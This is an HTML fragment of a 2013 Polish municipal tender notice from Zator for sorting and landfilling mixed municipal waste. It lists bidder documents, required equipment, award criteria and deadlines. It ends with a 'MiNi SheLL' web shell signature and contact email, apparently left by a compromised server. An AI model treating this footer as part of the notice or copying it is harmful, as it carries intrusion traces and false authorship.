<p>1. Wypełniony i podpisany przez uprawnionego przedstawiciela do reprezentowania wykonawcy formularz ofertowy wraz z formularzem cenowym - załącznik nr 1do oferty;
     	2. Podpisane przez uprawnionego przedstawiciela do reprezentowania wykonawcy oświadczenie Wykonawcy zgodnie z art. 22 ust. 1 pkt 1-4 ustawy - zał. nr 2 do oferty.
     3. Podpisane przez uprawnionego przedstawiciela do reprezentowania wykonawcy oświadczenie Wykonawcy zgodnie z art. 24 ust. 1 i 2 Ustawy - zał. nr 3 do oferty.
     4. Kopia aktualnego zezwolenia zintegrowanego na prowadzenie  instalacji  - zał. nr 4 do oferty. 
5. wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług,  w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, wraz z załączeniem  dowodów potwierdzających, że te dostawy lub usługi zostały wykonane lub są wykonywane  należycie, z uwzględnieniem :
       - co   najmniej   jednej   usługi   przesortowania   niesegregowanych   (zmieszanych) odpadów   komunalnych     odbieranych od właścicieli nieruchomości lub przez podmioty odbierające odpady od właścicieli   nieruchomości w ilości co najmniej 3.000 Mg,
       - co   najmniej   jednej   usługi   zagospodarowania   odpadów   poprzez   składowanie niesegregowanych   (zmieszanych) odpadów komunalnych w ilości co najmniej 3.000 Mg,
zgodnie z opisem warunku udziału w  postępowaniu zawartym w pkt VI, Specyfikacji Istotnych  Warunków Zamówienia. - zał. nr 5 do oferty.
6. Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, ze wskazaniem co najmniej jednej   osoby posiadającej doświadczenie w kierowaniu składowiskiem odpadów - zał. nr 6 do oferty. 
7. Wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług w celu   realizacji   zamówienia wraz z informacją o podstawie dysponowania tymi zasobami - zał. nr 7 do oferty - z uwzględnieniem:
a/ instalacji do mechaniczno-biologicznego przetwarzania odpadów komunalnych w skład której wchodzi m.in: linia sortownicza zmieszanych odpadów komunalnych z sitem bębnowym o oczkach 20 mm i 80 mm, 
b/ separatora   magnetycznego   i   przenośników taśmowych,   kabiny sortowniczej, o przepustowości co najmniej odpowiadającej ilości odpadów zamawiającego przewidzianych do zagospodarowania,
c/ instalacji do składowania odpadów powstających w procesie mechaniczno-biologicznego   przetwarzania   zmieszanych   odpadów   komunalnych   oraz pozostałości   z   sortowania   odpadów   komunalnych   przeznaczonych   do składowania,
d/ instalacji do kompostowania odpadów zielonych i odpadów ulegających biodegradacji, oraz frakcji   podsitowej 0-80 mm wyposażoną w bioreaktory, każdy o przepustowości co najmniej 300 Mg wraz z odpowiednim   zapleczem   do   kompostowania   w   pryzmach,   sterownią   i przepompownią ścieków,
e/ kompaktora - co najmniej 1szt.,
f/ ładowarki - co najmniej 1szt.,
g/ wagi samochodowej - co najmniej 1szt.,
h/ wózka widłowego - co najmniej 1szt.,
      i/ automatycznej myjki do kół i podwozi samochodowych - co najmniej 1szt.
8. Kopia opłaconej polisy, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest  ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia - zgodnie z opisem warunku udziału w postępowaniu zawartym w pkt. VI SIWZ. - zał. nr 8 do oferty.
UWAGA ! Z treści oferty (np. z treści polisy) musi wynikać, że na dzień składania ofert jest ona opłacona.  
9. Aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy. - zał. nr 9 do oferty.
     10. Lista podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5       ustawy      pzp., albo informacja o tym, że nie należy do grupy kapitałowej - zał. nr 10 do oferty.
    11. Jeżeli  wykonawca przewiduje udział  podwykonawców określi rzeczowo-finansowy zakres robót,     które zamierza  powierzyć do realizacji podwykonawcom. - zał. nr 11 do oferty.
    12.Dowód wniesienia wadium.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Odległość centrum Zatora od instalacji - 20</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wzór umowy jaka zostanie zawarta z wybranym wykonawcą stanowi załącznik nr 1A do SIWZ.
2. Zgodnie z art. 144 ust. 1 ustawy Pzp Zamawiający dopuszcza możliwość dokonania  zmian zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy, aneksem do umowy. Zamawiający przewiduje następujące możliwości dokonania zmiany zawartej umowy oraz określa warunki takiej zmiany w przypadku:
a/ ustawowej zmiany stawki podatku od towarów i usług (VAT), wówczas zmienione zostanie wynagrodzenie Wykonawcy brutto o procent zmiany podatku VAT,
b/ terminu realizacji zadania, który może ulec zmianie w przypadkach, na które Zamawiający bądź Wykonawca nie mógł mieć wpływu:
- wystąpienie okoliczności lub zdarzeń uniemożliwiających realizację w wyznaczonym terminie przedmiotu zamówienia, bez możliwości usunięcia lub likwidacji powyższych okoliczności lub zdarzeń. 
- warunkiem zmiany terminu umownego realizacji przedmiotu zamówienia jest stwierdzenie przez Zamawiającego, na wniosek Wykonawcy, konieczności zmiany terminu umownego,
c/ terminów płatności i innych:
- aktualizacji rozwiązań ze względu na postęp technologiczny lub gdyby zastosowanie przewidzianych w siwz rozwiązań groziło niewykonaniem lub wadliwym wykonaniem zamówienia,
- zmiany w obowiązujących przepisach - w tym przepisach prawa miejscowego, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego.
3. Zamawiający zawrze umowę z wybranym Wykonawcą w terminach, o których mowa w art. 94 Pzp.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zator.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Zatorze, Plac Marszałka Józefa Piłsudskiego 1..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.05.2013 godzina 10:00, miejsce: Urząd Miejski w Zatorze, Plac Marszałka Józefa Piłsudskiego 1..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com